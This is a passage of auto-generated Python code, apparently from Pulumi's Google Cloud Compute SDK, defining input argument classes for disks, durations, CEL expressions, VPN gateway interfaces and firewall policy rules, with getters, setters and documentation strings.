"""
return pulumi.get(self, "replacement")
@replacement.setter
def replacement(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "replacement", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input['DeprecationStatusState']]:
"""
The deprecation state of this resource. This can be ACTIVE, DEPRECATED, OBSOLETE, or DELETED. Operations which communicate the end of life date for an image, can use ACTIVE. Operations which create a new resource using a DEPRECATED resource will return successfully, but with a warning indicating the deprecated resource and recommending its replacement. Operations which use OBSOLETE or DELETED resources will be rejected and result in an error.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input['DeprecationStatusState']]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="stateOverride")
def state_override(self) -> Optional[pulumi.Input['RolloutPolicyArgs']]:
"""
The rollout policy for this deprecation. This policy is only enforced by image family views. The rollout policy restricts the zones where the associated resource is considered in a deprecated state. When the rollout policy does not include the user specified zone, or if the zone is rolled out, the associated resource is considered in a deprecated state. The rollout policy for this deprecation is read-only, except for allowlisted users. This field might not be configured. To view the latest non-deprecated image in a specific zone, use the imageFamilyViews.get method.
"""
return pulumi.get(self, "state_override")
@state_override.setter
def state_override(self, value: Optional[pulumi.Input['RolloutPolicyArgs']]):
pulumi.set(self, "state_override", value)
@pulumi.input_type
class DiskInstantiationConfigArgs:
def __init__(__self__, *,
auto_delete: Optional[pulumi.Input[bool]] = None,
custom_image: Optional[pulumi.Input[str]] = None,
device_name: Optional[pulumi.Input[str]] = None,
instantiate_from: Optional[pulumi.Input['DiskInstantiationConfigInstantiateFrom']] = None):
"""
A specification of the desired way to instantiate a disk in the instance template when its created from a source instance.
:param pulumi.Input[bool] auto_delete: Specifies whether the disk will be auto-deleted when the instance is deleted (but not when the disk is detached from the instance).
:param pulumi.Input[str] custom_image: The custom source image to be used to restore this disk when instantiating this instance template.
:param pulumi.Input[str] device_name: Specifies the device name of the disk to which the configurations apply to.
:param pulumi.Input['DiskInstantiationConfigInstantiateFrom'] instantiate_from: Specifies whether to include the disk and what image to use. Possible values are: - source-image: to use the same image that was used to create the source instance's corresponding disk. Applicable to the boot disk and additional read-write disks. - source-image-family: to use the same image family that was used to create the source instance's corresponding disk. Applicable to the boot disk and additional read-write disks. - custom-image: to use a user-provided image url for disk creation. Applicable to the boot disk and additional read-write disks. - attach-read-only: to attach a read-only disk. Applicable to read-only disks. - do-not-include: to exclude a disk from the template. Applicable to additional read-write disks, local SSDs, and read-only disks.
"""
if auto_delete is not None:
pulumi.set(__self__, "auto_delete", auto_delete)
if custom_image is not None:
pulumi.set(__self__, "custom_image", custom_image)
if device_name is not None:
pulumi.set(__self__, "device_name", device_name)
if instantiate_from is not None:
pulumi.set(__self__, "instantiate_from", instantiate_from)
@property
@pulumi.getter(name="autoDelete")
def auto_delete(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies whether the disk will be auto-deleted when the instance is deleted (but not when the disk is detached from the instance).
"""
return pulumi.get(self, "auto_delete")
@auto_delete.setter
def auto_delete(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_delete", value)
@property
@pulumi.getter(name="customImage")
def custom_image(self) -> Optional[pulumi.Input[str]]:
"""
The custom source image to be used to restore this disk when instantiating this instance template.
"""
return pulumi.get(self, "custom_image")
@custom_image.setter
def custom_image(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "custom_image", value)
@property
@pulumi.getter(name="deviceName")
def device_name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the device name of the disk to which the configurations apply to.
"""
return pulumi.get(self, "device_name")
@device_name.setter
def device_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "device_name", value)
@property
@pulumi.getter(name="instantiateFrom")
def instantiate_from(self) -> Optional[pulumi.Input['DiskInstantiationConfigInstantiateFrom']]:
"""
Specifies whether to include the disk and what image to use. Possible values are: - source-image: to use the same image that was used to create the source instance's corresponding disk. Applicable to the boot disk and additional read-write disks. - source-image-family: to use the same image family that was used to create the source instance's corresponding disk. Applicable to the boot disk and additional read-write disks. - custom-image: to use a user-provided image url for disk creation. Applicable to the boot disk and additional read-write disks. - attach-read-only: to attach a read-only disk. Applicable to read-only disks. - do-not-include: to exclude a disk from the template. Applicable to additional read-write disks, local SSDs, and read-only disks.
"""
return pulumi.get(self, "instantiate_from")
@instantiate_from.setter
def instantiate_from(self, value: Optional[pulumi.Input['DiskInstantiationConfigInstantiateFrom']]):
pulumi.set(self, "instantiate_from", value)
@pulumi.input_type
class DisplayDeviceArgs:
def __init__(__self__, *,
enable_display: Optional[pulumi.Input[bool]] = None):
"""
A set of Display Device options
:param pulumi.Input[bool] enable_display: Defines whether the instance has Display enabled.
"""
if enable_display is not None:
pulumi.set(__self__, "enable_display", enable_display)
@property
@pulumi.getter(name="enableDisplay")
def enable_display(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance has Display enabled.
"""
return pulumi.get(self, "enable_display")
@enable_display.setter
def enable_display(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_display", value)
@pulumi.input_type
class DistributionPolicyZoneConfigurationArgs:
def __init__(__self__, *,
zone: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] zone: The URL of the zone. The zone must exist in the region where the managed instance group is located.
"""
if zone is not None:
pulumi.set(__self__, "zone", zone)
@property
@pulumi.getter
def zone(self) -> Optional[pulumi.Input[str]]:
"""
The URL of the zone. The zone must exist in the region where the managed instance group is located.
"""
return pulumi.get(self, "zone")
@zone.setter
def zone(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "zone", value)
@pulumi.input_type
class DistributionPolicyArgs:
def __init__(__self__, *,
target_shape: Optional[pulumi.Input['DistributionPolicyTargetShape']] = None,
zones: Optional[pulumi.Input[Sequence[pulumi.Input['DistributionPolicyZoneConfigurationArgs']]]] = None):
"""
:param pulumi.Input['DistributionPolicyTargetShape'] target_shape: The distribution shape to which the group converges either proactively or on resize events (depending on the value set in updatePolicy.instanceRedistributionType).
:param pulumi.Input[Sequence[pulumi.Input['DistributionPolicyZoneConfigurationArgs']]] zones: Zones where the regional managed instance group will create and manage its instances.
"""
if target_shape is not None:
pulumi.set(__self__, "target_shape", target_shape)
if zones is not None:
pulumi.set(__self__, "zones", zones)
@property
@pulumi.getter(name="targetShape")
def target_shape(self) -> Optional[pulumi.Input['DistributionPolicyTargetShape']]:
"""
The distribution shape to which the group converges either proactively or on resize events (depending on the value set in updatePolicy.instanceRedistributionType).
"""
return pulumi.get(self, "target_shape")
@target_shape.setter
def target_shape(self, value: Optional[pulumi.Input['DistributionPolicyTargetShape']]):
pulumi.set(self, "target_shape", value)
@property
@pulumi.getter
def zones(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['DistributionPolicyZoneConfigurationArgs']]]]:
"""
Zones where the regional managed instance group will create and manage its instances.
"""
return pulumi.get(self, "zones")
@zones.setter
def zones(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['DistributionPolicyZoneConfigurationArgs']]]]):
pulumi.set(self, "zones", value)
@pulumi.input_type
class DurationArgs:
def __init__(__self__, *,
nanos: Optional[pulumi.Input[int]] = None,
seconds: Optional[pulumi.Input[str]] = None):
"""
A Duration represents a fixed-length span of time represented as a count of seconds and fractions of seconds at nanosecond resolution. It is independent of any calendar and concepts like "day" or "month". Range is approximately 10,000 years.
:param pulumi.Input[int] nanos: Span of time that's a fraction of a second at nanosecond resolution. Durations less than one second are represented with a 0 `seconds` field and a positive `nanos` field. Must be from 0 to 999,999,999 inclusive.
:param pulumi.Input[str] seconds: Span of time at a resolution of a second. Must be from 0 to 315,576,000,000 inclusive. Note: these bounds are computed from: 60 sec/min * 60 min/hr * 24 hr/day * 365.25 days/year * 10000 years
"""
if nanos is not None:
pulumi.set(__self__, "nanos", nanos)
if seconds is not None:
pulumi.set(__self__, "seconds", seconds)
@property
@pulumi.getter
def nanos(self) -> Optional[pulumi.Input[int]]:
"""
Span of time that's a fraction of a second at nanosecond resolution. Durations less than one second are represented with a 0 `seconds` field and a positive `nanos` field. Must be from 0 to 999,999,999 inclusive.
"""
return pulumi.get(self, "nanos")
@nanos.setter
def nanos(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "nanos", value)
@property
@pulumi.getter
def seconds(self) -> Optional[pulumi.Input[str]]:
"""
Span of time at a resolution of a second. Must be from 0 to 315,576,000,000 inclusive. Note: these bounds are computed from: 60 sec/min * 60 min/hr * 24 hr/day * 365.25 days/year * 10000 years
"""
return pulumi.get(self, "seconds")
@seconds.setter
def seconds(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "seconds", value)
@pulumi.input_type
class ExprArgs:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
expression: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
title: Optional[pulumi.Input[str]] = None):
"""
Represents a textual expression in the Common Expression Language (CEL) syntax. CEL is a C-like expression language. The syntax and semantics of CEL are documented at https://github.com/google/cel-spec. Example (Comparison): title: "Summary size limit" description: "Determines if a summary is less than 100 chars" expression: "document.summary.size() < 100" Example (Equality): title: "Requestor is owner" description: "Determines if requestor is the document owner" expression: "document.owner == request.auth.claims.email" Example (Logic): title: "Public documents" description: "Determine whether the document should be publicly visible" expression: "document.type != 'private' && document.type != 'internal'" Example (Data Manipulation): title: "Notification string" description: "Create a notification string with a timestamp." expression: "'New message received at ' + string(document.create_time)" The exact variables and functions that may be referenced within an expression are determined by the service that evaluates it. See the service documentation for additional information.
:param pulumi.Input[str] description: Optional. Description of the expression. This is a longer text which describes the expression, e.g. when hovered over it in a UI.
:param pulumi.Input[str] expression: Textual representation of an expression in Common Expression Language syntax.
:param pulumi.Input[str] location: Optional. String indicating the location of the expression for error reporting, e.g. a file name and a position in the file.
:param pulumi.Input[str] title: Optional. Title for the expression, i.e. a short string describing its purpose. This can be used e.g. in UIs which allow to enter the expression.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if expression is not None:
pulumi.set(__self__, "expression", expression)
if location is not None:
pulumi.set(__self__, "location", location)
if title is not None:
pulumi.set(__self__, "title", title)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Optional. Description of the expression. This is a longer text which describes the expression, e.g. when hovered over it in a UI.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def expression(self) -> Optional[pulumi.Input[str]]:
"""
Textual representation of an expression in Common Expression Language syntax.
"""
return pulumi.get(self, "expression")
@expression.setter
def expression(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expression", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
Optional. String indicating the location of the expression for error reporting, e.g. a file name and a position in the file.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def title(self) -> Optional[pulumi.Input[str]]:
"""
Optional. Title for the expression, i.e. a short string describing its purpose. This can be used e.g. in UIs which allow to enter the expression.
"""
return pulumi.get(self, "title")
@title.setter
def title(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "title", value)
@pulumi.input_type
class ExternalVpnGatewayInterfaceArgs:
def __init__(__self__, *,
id: Optional[pulumi.Input[int]] = None,
ip_address: Optional[pulumi.Input[str]] = None):
"""
The interface for the external VPN gateway.
:param pulumi.Input[int] id: The numeric ID of this interface. The allowed input values for this id for different redundancy types of external VPN gateway: - SINGLE_IP_INTERNALLY_REDUNDANT - 0 - TWO_IPS_REDUNDANCY - 0, 1 - FOUR_IPS_REDUNDANCY - 0, 1, 2, 3
:param pulumi.Input[str] ip_address: IP address of the interface in the external VPN gateway. Only IPv4 is supported. This IP address can be either from your on-premise gateway or another Cloud provider's VPN gateway, it cannot be an IP address from Google Compute Engine.
"""
if id is not None:
pulumi.set(__self__, "id", id)
if ip_address is not None:
pulumi.set(__self__, "ip_address", ip_address)
@property
@pulumi.getter
def id(self) -> Optional[pulumi.Input[int]]:
"""
The numeric ID of this interface. The allowed input values for this id for different redundancy types of external VPN gateway: - SINGLE_IP_INTERNALLY_REDUNDANT - 0 - TWO_IPS_REDUNDANCY - 0, 1 - FOUR_IPS_REDUNDANCY - 0, 1, 2, 3
"""
return pulumi.get(self, "id")
@id.setter
def id(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "id", value)
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> Optional[pulumi.Input[str]]:
"""
IP address of the interface in the external VPN gateway. Only IPv4 is supported. This IP address can be either from your on-premise gateway or another Cloud provider's VPN gateway, it cannot be an IP address from Google Compute Engine.
"""
return pulumi.get(self, "ip_address")
@ip_address.setter
def ip_address(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_address", value)
@pulumi.input_type
class FileContentBufferArgs:
def __init__(__self__, *,
content: Optional[pulumi.Input[str]] = None,
file_type: Optional[pulumi.Input['FileContentBufferFileType']] = None):
"""
:param pulumi.Input[str] content: The raw content in the secure keys file.
:param pulumi.Input['FileContentBufferFileType'] file_type: The file type of source file.
"""
if content is not None:
pulumi.set(__self__, "content", content)
if file_type is not None:
pulumi.set(__self__, "file_type", file_type)
@property
@pulumi.getter
def content(self) -> Optional[pulumi.Input[str]]:
"""
The raw content in the secure keys file.
"""
return pulumi.get(self, "content")
@content.setter
def content(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "content", value)
@property
@pulumi.getter(name="fileType")
def file_type(self) -> Optional[pulumi.Input['FileContentBufferFileType']]:
"""
The file type of source file.
"""
return pulumi.get(self, "file_type")
@file_type.setter
def file_type(self, value: Optional[pulumi.Input['FileContentBufferFileType']]):
pulumi.set(self, "file_type", value)
@pulumi.input_type
class FirewallAllowedItemArgs:
def __init__(__self__, *,
ip_protocol: Optional[pulumi.Input[str]] = None,
ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] ip_protocol: The IP protocol to which this rule applies. The protocol type is required when creating a firewall rule. This value can either be one of the following well known protocol strings (tcp, udp, icmp, esp, ah, ipip, sctp) or the IP protocol number.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ports: An optional list of ports to which this rule applies. This field is only applicable for the UDP or TCP protocol. Each entry must be either an integer or a range. If not specified, this rule applies to connections through any port. Example inputs include: ["22"], ["80","443"], and ["12345-12349"].
"""
if ip_protocol is not None:
pulumi.set(__self__, "ip_protocol", ip_protocol)
if ports is not None:
pulumi.set(__self__, "ports", ports)
@property
@pulumi.getter(name="ipProtocol")
def ip_protocol(self) -> Optional[pulumi.Input[str]]:
"""
The IP protocol to which this rule applies. The protocol type is required when creating a firewall rule. This value can either be one of the following well known protocol strings (tcp, udp, icmp, esp, ah, ipip, sctp) or the IP protocol number.
"""
return pulumi.get(self, "ip_protocol")
@ip_protocol.setter
def ip_protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_protocol", value)
@property
@pulumi.getter
def ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An optional list of ports to which this rule applies. This field is only applicable for the UDP or TCP protocol. Each entry must be either an integer or a range. If not specified, this rule applies to connections through any port. Example inputs include: ["22"], ["80","443"], and ["12345-12349"].
"""
return pulumi.get(self, "ports")
@ports.setter
def ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ports", value)
@pulumi.input_type
class FirewallDeniedItemArgs:
def __init__(__self__, *,
ip_protocol: Optional[pulumi.Input[str]] = None,
ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] ip_protocol: The IP protocol to which this rule applies. The protocol type is required when creating a firewall rule. This value can either be one of the following well known protocol strings (tcp, udp, icmp, esp, ah, ipip, sctp) or the IP protocol number.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ports: An optional list of ports to which this rule applies. This field is only applicable for the UDP or TCP protocol. Each entry must be either an integer or a range. If not specified, this rule applies to connections through any port. Example inputs include: ["22"], ["80","443"], and ["12345-12349"].
"""
if ip_protocol is not None:
pulumi.set(__self__, "ip_protocol", ip_protocol)
if ports is not None:
pulumi.set(__self__, "ports", ports)
@property
@pulumi.getter(name="ipProtocol")
def ip_protocol(self) -> Optional[pulumi.Input[str]]:
"""
The IP protocol to which this rule applies. The protocol type is required when creating a firewall rule. This value can either be one of the following well known protocol strings (tcp, udp, icmp, esp, ah, ipip, sctp) or the IP protocol number.
"""
return pulumi.get(self, "ip_protocol")
@ip_protocol.setter
def ip_protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_protocol", value)
@property
@pulumi.getter
def ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An optional list of ports to which this rule applies. This field is only applicable for the UDP or TCP protocol. Each entry must be either an integer or a range. If not specified, this rule applies to connections through any port. Example inputs include: ["22"], ["80","443"], and ["12345-12349"].
"""
return pulumi.get(self, "ports")
@ports.setter
def ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ports", value)
@pulumi.input_type
class FirewallLogConfigArgs:
def __init__(__self__, *,
enable: Optional[pulumi.Input[bool]] = None,
metadata: Optional[pulumi.Input['FirewallLogConfigMetadata']] = None):
"""
The available logging options for a firewall rule.
:param pulumi.Input[bool] enable: This field denotes whether to enable logging for a particular firewall rule.
:param pulumi.Input['FirewallLogConfigMetadata'] metadata: This field can only be specified for a particular firewall rule if logging is enabled for that rule. This field denotes whether to include or exclude metadata for firewall logs.
"""
if enable is not None:
pulumi.set(__self__, "enable", enable)
if metadata is not None:
pulumi.set(__self__, "metadata", metadata)
@property
@pulumi.getter
def enable(self) -> Optional[pulumi.Input[bool]]:
"""
This field denotes whether to enable logging for a particular firewall rule.
"""
return pulumi.get(self, "enable")
@enable.setter
def enable(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable", value)
@property
@pulumi.getter
def metadata(self) -> Optional[pulumi.Input['FirewallLogConfigMetadata']]:
"""
This field can only be specified for a particular firewall rule if logging is enabled for that rule. This field denotes whether to include or exclude metadata for firewall logs.
"""
return pulumi.get(self, "metadata")
@metadata.setter
def metadata(self, value: Optional[pulumi.Input['FirewallLogConfigMetadata']]):
pulumi.set(self, "metadata", value)
@pulumi.input_type
class FirewallPolicyAssociationArgs:
def __init__(__self__, *,
attachment_target: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] attachment_target: The target that the firewall policy is attached to.
:param pulumi.Input[str] name: The name for an association.
"""
if attachment_target is not None:
pulumi.set(__self__, "attachment_target", attachment_target)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="attachmentTarget")
def attachment_target(self) -> Optional[pulumi.Input[str]]:
"""
The target that the firewall policy is attached to.
"""
return pulumi.get(self, "attachment_target")
@attachment_target.setter
def attachment_target(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "attachment_target", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name for an association.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class FirewallPolicyRuleMatcherLayer4ConfigArgs:
def __init__(__self__, *,
ip_protocol: Optional[pulumi.Input[str]] = None,
ports: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] ip_protocol: The IP protocol to which this rule applies. The protocol type is required when creating a firewall rule. This value can either be one of the following well known protocol strings (tcp, udp, icmp, esp, ah, ipip, sctp), or the IP protocol number.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ports: An optional list of ports to which this rule applies. This field is only applicable for UDP or TCP protocol. Each entry must be either an integer or a range. If not specified, this rule applies to connections through any port. Example inputs include: ["22"], ["80","443"], and ["12345-12349"].
"""
if ip_protocol is not None:
pulumi.set(__self__, "ip_protocol", ip_protocol)
if ports is not None:
pulumi.set(__self__, "ports", ports)
@property
@pulumi.getter(name="ipProtocol")
def ip_protocol(self) -> Optional[pulumi.Input[str]]:
"""
The IP protocol to which this rule applies. The protocol type is required when creating a firewall rule. This value can either be one of the following well known protocol strings (tcp, udp, icmp, esp, ah, ipip, sctp), or the IP protocol number.
"""
return pulumi.get(self, "ip_protocol")
@ip_protocol.setter
def ip_protocol(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "ip_protocol", value)
@property
@pulumi.getter
def ports(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
An optional list of ports to which this rule applies. This field is only applicable for UDP or TCP protocol. Each entry must be either an integer or a range. If not specified, this rule applies to connections through any port. Example inputs include: ["22"], ["80","443"], and ["12345-12349"].
"""
return pulumi.get(self, "ports")
@ports.setter
def ports(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ports", value)
@pulumi.input_type
class FirewallPolicyRuleMatcherArgs:
def __init__(__self__, *,
dest_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
layer4_configs: Optional[pulumi.Input[Sequence[pulumi.Input['FirewallPolicyRuleMatcherLayer4ConfigArgs']]]] = None,
src_ip_ranges: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Represents a match condition that incoming traffic is evaluated against. Exactly one field must be specified.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dest_ip_ranges: CIDR IP address range. Maximum number of destination CIDR IP ranges allowed is 5000.
:param pulumi.Input[Sequence[pulumi.Input['FirewallPolicyRuleMatcherLayer4ConfigArgs']]] layer4_configs: Pairs of IP protocols and ports that the rule should match.
:param pulumi.Input[Sequence[pulumi.Input[str]]] src_ip_ranges: CIDR IP address range. Maximum number of source CIDR IP ranges allowed is 5000.
"""
if dest_ip_ranges is not None:
pulumi.set(__self__, "dest_ip_ranges", dest_ip_ranges)
if layer4_configs is not None:
pulumi.set(__self__, "layer4_configs", layer4_configs)
if src_ip_ranges is not None:
pulumi.set(__self__, "src_ip_ranges", src_ip_ranges)
@property
@pulumi.getter(name="destIpRanges")
def dest_ip_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
CIDR IP address range. Maximum number of destination CIDR IP ranges allowed is 5000.
"""
return pulumi.get(self, "dest_ip_ranges")
@dest_ip_ranges.setter
def dest_ip_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "dest_ip_ranges", value)
@property
@pulumi.getter(name="layer4Configs")
def layer4_configs(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['FirewallPolicyRuleMatcherLayer4ConfigArgs']]]]:
"""
Pairs of IP protocols and ports that the rule should match.
"""
return pulumi.get(self, "layer4_configs")
@layer4_configs.setter
def layer4_configs(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['FirewallPolicyRuleMatcherLayer4ConfigArgs']]]]):
pulumi.set(self, "layer4_configs", value)
@property
@pulumi.getter(name="srcIpRanges")
def src_ip_ranges(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
CIDR IP address range. Maximum number of source CIDR IP ranges allowed is 5000.
"""
return pulumi.get(self, "src_ip_ranges")
@src_ip_ranges.setter
def src_ip_ranges(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "src_ip_ranges", value)
@pulumi.input_type
class FirewallPolicyRuleArgs:
def __init__(__self__, *,
action: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
direction: Optional[pulumi.Input['FirewallPolicyRuleDirection']] = None,
disabled: Optional[pulumi.Input[bool]] = None,
enable_logging: Optional[pulumi.Input[bool]] = None,
match: Optional[pulumi.Input['FirewallPolicyRuleMatcherArgs']] = None,
priority: Optional[pulumi.Input[int]] = None,
target_resources: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
target_service_accounts: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Represents a rule that describes one or more match conditions along with the action to be taken when traffic matches this condition (allow or deny).
:param pulumi.Input[str] action: The Action to perform when the client connection triggers the rule. Can currently be either "allow" or "deny()" where valid values for status are 403, 404, and 502.
:param pulumi.Input[str] description: An optional description for this resource.
:param pulumi.Input['FirewallPolicyRuleDirection'] direction: The direction in which this rule applies.
:param pulumi.Input[bool] disabled: Denotes whether the firewall policy rule is disabled. When set to true, the firewall policy rule is not enforced and traffic behaves as if it did not exist. If this is unspecified, the firewall policy rule will be enabled.
:param pulumi.Input[bool] enable_logging: Denotes whether to enable logging for a particular rule. If logging is enabled, logs will be exported to the configured export destination in Stackdriver. Logs may be exported to BigQuery or Pub/Sub. Note: you cannot enable logging on "goto_next" rules.
:param pulumi.Input['FirewallPolicyRuleMatcherArgs'] match: A match condition that incoming traffic is evaluated against. If it evaluates to true, the corresponding 'action' is enforced.
:param pulumi.Input[int] priority: An integer indicating the priority of a rule in the list. The priority must be a positive value between 0 and 2147483647. Rules are evaluated from highest to lowest priority where 0 is the highest priority and 2147483647 is the lowest prority.
:param pulumi.Input[Sequence[pulumi.Input[str]]] target_resources: A list of network resource URLs to which this rule applies. This field allows you to control which network's VMs get this rule. If this field is left blank, all VMs within the organization will receive the rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] target_service_accounts: A list of service accounts indicating the sets of instances that are applied with this rule.
"""
if action is not None:
pulumi.set(__self__, "action", action)
if description is not None:
pulumi.set(__self__, "description", description)
if direction is not None:
pulumi.set(__self__, "direction", direction)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if enable_logging is not None:
pulumi.set(__self__, "enable_logging", enable_logging)
if match is not None:
pulumi.set(__self__, "match", match)
if priority is not None:
pulumi.set(__self__, "priority", priority)
if target_resources is not None:
pulumi.set(__self__, "target_resources", target_resources)
if target_service_accounts is not None:
pulumi.set(__self__, "target_service_accounts", target_service_accounts)
@property
@pulumi.getter
def action(self) -> Optional[pulumi.Input[str]]:
"""
The Action to perform when the client connection triggers the rule. Can currently be either "allow" or "deny()" where valid values for status are 403, 404, and 502.
"""
return pulumi.get(self, "action")
@action.setter
def action(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "action", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
An optional description for this resource.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def direction(self) -> Optional[pulumi.Input['FirewallPolicyRuleDirection']]:
"""
The direction in which this rule applies.
"""
return pulumi.get(self, "direction")
@direction.setter
def direction(self, value: Optional[pulumi.Input['FirewallPolicyRuleDirection']]):
pulumi.set(self, "direction", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
Denotes whether the firewall policy rule is disabled. When set to true, the firewall policy rule is not enforced and traffic behaves as if it did not exist. If this is unspecified, the firewall policy rule will be enabled.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter(name="enableLogging")
def enable_logging(self) -> Optional[pulumi.Input[bool]]:
"""
Denotes whether to enable logging for a particular rule. If logging is enabled, logs will be exported to the configured export destination in Stackdriver. Logs may be exported to BigQuery or Pub/Sub. Note: you cannot enable logging on "goto_next" rules.
"""
return pulumi.get(self, "enable_logging")
@enable_logging.setter
def enable_logging(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_logging", value)
@property
@pulumi.getter
def match(self) -> Optional[pulumi.Input['FirewallPolicyRuleMatcherArgs']]:
"""
A match condition that incoming traffic is evaluated against. If it evaluates to true, the corresponding 'action' is enforced.
"""
return pulumi.get(self, "match")
@match.setter
def match(self, value: Optional[pulumi.Input['FirewallPolicyRuleMatcherArgs']]):
pulumi.set(self, "match", value)
@property
@pulumi.getter
def priority(self) -> Optional[pulumi.Input[int]]:
"""
An integer indicating the priority of a rule in the list. The priority must be a positive value between 0 and 2147483647. Rules are evaluated from highest to lowest priority where 0 is the highest priority and 2147483647 is the lowest prority.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter(name="targetResources")
def target_resources(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of network resource URLs to which this rule applies. This field allows you to control which network's VMs get this rule. If this field is left blank, all VMs within the organization will receive the rule.
"""
return pulumi.get(self, "target_resources")
@target_resources.setter
def target_resources(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "target_resources", value)
@property
@pulumi.getter(name="targetServiceAccounts")
def target_service_accounts(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of service accounts indicating the sets of instances that are applied with this rule.
"""
return pulumi.get(self, "target_service_accounts")
@target_service_accounts.setter
def target_service_accounts(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "target_service_accounts", value)
@pulumi.input_type
class FixedOrPercentArgs:
def __init__(__self__, *,
fixed: Optional[pulumi.Input[int]] = None,
percent: Optional[pulumi.Input[int]] = None):
"""
Encapsulates numeric value that can be either absolute or relative.
:param pulumi.Input[int] fixed: Specifies a fixed number of VM instances. This must be a positive integer.
:param pulumi.Input[int] percent: Specifies a percentage of instances between 0 to 100%, inclusive. For example, specify 80 for 80%.
"""
if fixed is not None:
pulumi.set(__self__, "fixed", fixed)
if percent is not None:
pulumi.set(__self__, "percent", percent)
@property
@pulumi.getter
def fixed(self) -> Optional[pulumi.Input[int]]:
"""
